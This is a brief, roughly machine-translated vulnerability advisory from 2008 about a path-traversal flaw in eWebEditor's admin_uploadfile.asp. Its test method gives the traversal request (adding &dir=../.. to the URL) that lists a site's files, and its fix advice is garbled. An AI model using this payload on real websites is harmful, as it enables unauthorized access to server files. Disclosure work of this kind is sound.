ewebeditor traversal path vulnerability-vulnerability warning-the black bar safety net

2008-01-16T00:00:00
ID MYHACK58:62200818162
Type myhack58
Reporter 佚名
Modified 2008-01-16T00:00:00

Description

eWebEditor Description: eWebEditor is a WYSIWYG online editor. As the name suggests, is on the network using the WYSIWYG edit mode for editing illustrated articles, news, discussions stickers, circulars, notes and other word processing applications. ewebeditor/admin_uploadfile. asp The filter is not strict, resulting in the traversal path exploit < Reference:http://www. sebug. net,http://www.ewebeditor.net/ > Test method: [Warning]the following procedures(methods)may carry offensive,for security research and teaching purposes. At your own risk! ewebeditor/admin_uploadfile. asp? id=1 4 In id=1 4 behind add&dir=.. Plus &dir=../.. &dir=http://www.****. com/../.. look to the entire website file. Recommendations:no http://www. ewebeditor. net/